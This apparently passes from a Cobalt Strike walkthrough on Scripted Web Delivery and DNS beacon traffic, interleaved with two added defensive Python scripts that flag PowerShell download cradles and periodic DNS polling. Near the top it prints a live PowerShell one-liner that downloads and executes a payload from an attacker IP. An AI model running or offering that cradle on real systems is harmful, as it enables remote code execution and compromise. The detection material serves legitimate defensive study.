From the menu, go to Attacks > Web Drive-by > Scripted Web delivery (S). The following window pops up:
Clicking on the Launch button will open a second popup window with the payload to copy.
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://172.16.222.130:80/a'))"
Once the payload is executed, a session appears in Cobalt Strike:
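The one-liner above is a classic PowerShell download cradle: a hidden, profile-less PowerShell process fetches a script over HTTP and hands it to Invoke-Expression. As an added example (not part of the original page or of Cobalt Strike), here is a small detector that scores process-creation command lines for those traits; the sample events are constructed, Sysmon-style records and the field names are assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
# Field names "pid", "parent" and "cmdline" are assumptions for this example.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
                ".downloadstring('http://172.16.222.130:80/a'))\""},
    {"pid": 4188, "parent": "explorer.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"pid": 4201, "parent": "cmd.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
]

# Each indicator is one trait of the cradle; PowerShell accepts abbreviated
# switches, so -nop / -NoProfile and -w / -WindowStyle are matched alike.
INDICATORS = {
    "no_profile":         re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "hidden_window":      re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "invoke_expression":  re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "webclient_download": re.compile(r"(?i)net\.webclient\b.*?\.download(?:string|file)\s*\("),
    "remote_url":         re.compile(r"(?i)https?://[^\s'\"]+"),
}

# Parents that rarely have a legitimate reason to spawn PowerShell (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def classify_cmdline(cmdline):
    """Return (verdict, matched indicator names) for one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if "invoke_expression" in hits and "webclient_download" in hits:
        verdict = "download-cradle"          # fetch-and-eval: the pattern on this page
    elif "remote_url" in hits and ("hidden_window" in hits or "no_profile" in hits):
        verdict = "suspicious"               # remote content plus stealth switches
    else:
        verdict = "benign"
    return verdict, hits


def scan_events(events):
    """Run the classifier over process events and keep only the non-benign ones."""
    findings = []
    for ev in events:
        verdict, hits = classify_cmdline(ev["cmdline"])
        if verdict == "benign":
            continue
        if ev["parent"].lower() in OFFICE_PARENTS:
            hits = hits + ["office_parent"]   # extra context, not a trigger by itself
        findings.append({"pid": ev["pid"], "parent": ev["parent"],
                         "verdict": verdict, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Only the first constructed event is reported: the signed inventory script and the interactive Get-Process call each carry at most one indicator, which is why the verdict requires the fetch-and-evaluate pair rather than any single switch.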
Leaving the anti-virus aside, here is what the network traffic looks like:
Request for action
Once executed, the session will probably show up as an empty line. Right-click on it and select Interact. Enter commands (e.g. sleep 5) to force feedback from the target.
Pay attention to the 2 highlighted blocks below:
- the first block is the DNS traffic while an action is running (it carries data)
- the second block is the DNS traffic without an action (waiting for a task, with a return of
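The two blocks differ in shape: idle check-ins are short, evenly spaced queries, while task traffic shows up as bursts of long, encoded subdomains. As an added example (not part of the original page, and not a description of Cobalt Strike internals), the script below profiles a constructed resolver log per client and domain, separating short polling queries from long data-bearing ones and measuring how regular the polling interval is. The domain names, thresholds and log format are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed resolver log: "timestamp client qname qtype". Not real traffic;
# c2domain.example and intranet.example are placeholder names.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 api.c2domain.example A
2024-05-01T10:01:00 10.0.0.5 api.c2domain.example A
2024-05-01T10:02:00 10.0.0.5 api.c2domain.example A
2024-05-01T10:03:00 10.0.0.5 api.c2domain.example A
2024-05-01T10:04:00 10.0.0.5 api.c2domain.example A
2024-05-01T10:05:00 10.0.0.5 19a7e3f0c4b2d8a6e1f3.7c2b9e4d1a0f.c2domain.example TXT
2024-05-01T10:05:01 10.0.0.5 3e8d2c1b9a7f6e5d4c3b.b1d4e7a2c9f0.c2domain.example TXT
2024-05-01T10:05:02 10.0.0.5 5b4a3f2e1d0c9b8a7f6e.e2f5a8b1d4c7.c2domain.example TXT
2024-05-01T10:00:07 10.0.0.9 www.intranet.example A
2024-05-01T10:13:41 10.0.0.9 mail.intranet.example A
2024-05-01T10:48:02 10.0.0.9 www.intranet.example A
"""

DATA_LABEL_MIN_LEN = 24   # assumption: a subdomain this long is likely carrying encoded data
MIN_SHORT_QUERIES = 4     # assumption: need a few samples before calling traffic periodic
MAX_INTERVAL_CV = 0.2     # assumption: spread/mean below this looks like a fixed sleep timer


def parse_log(text):
    """Turn the text log into (timestamp, client, qname, qtype) tuples."""
    rows = []
    for line in text.strip().splitlines():
        ts, client, qname, qtype = line.split()
        rows.append((datetime.fromisoformat(ts), client, qname.lower().rstrip("."), qtype))
    return rows


def registered_domain(qname):
    # Assumption: the registered domain is the last two labels (no public-suffix list here).
    return ".".join(qname.split(".")[-2:])


def profile_dns(rows):
    """Per (client, domain): count short vs data-like queries and score interval regularity."""
    groups = defaultdict(list)
    for ts, client, qname, qtype in rows:
        groups[(client, registered_domain(qname))].append((ts, qname, qtype))

    profiles = {}
    for (client, domain), queries in groups.items():
        queries.sort()
        short, data = [], []
        for ts, qname, _qtype in queries:
            sub = qname[: -len(domain) - 1] if qname != domain else ""
            (data if len(sub) >= DATA_LABEL_MIN_LEN else short).append(ts)

        # Gaps between consecutive short queries; a sleeping implant polls on a timer.
        gaps = [(b - a).total_seconds() for a, b in zip(short, short[1:])]
        interval_mean = mean(gaps) if gaps else 0.0
        cv = pstdev(gaps) / interval_mean if len(gaps) > 1 and interval_mean else None
        periodic = len(short) >= MIN_SHORT_QUERIES and cv is not None and cv <= MAX_INTERVAL_CV

        if periodic and data:
            verdict = "periodic-polling+data"   # idle check-ins plus bursts of encoded labels
        elif periodic:
            verdict = "periodic-polling"
        else:
            verdict = "unremarkable"
        profiles[(client, domain)] = {
            "queries": len(queries), "short_queries": len(short), "data_queries": len(data),
            "interval_mean_s": interval_mean, "interval_cv": cv, "verdict": verdict,
        }
    return profiles


if __name__ == "__main__":
    for key, prof in profile_dns(parse_log(SAMPLE_LOG)).items():
        print(key, prof)
```

In the constructed log the first client polls one domain every 60 seconds and then sends three long TXT queries in a one-second burst, which is the two-block picture the text describes; the second client's intranet lookups are irregular and few, so they are left alone. On real resolver logs the interval threshold should be loosened to tolerate the jitter a sleep timer may add.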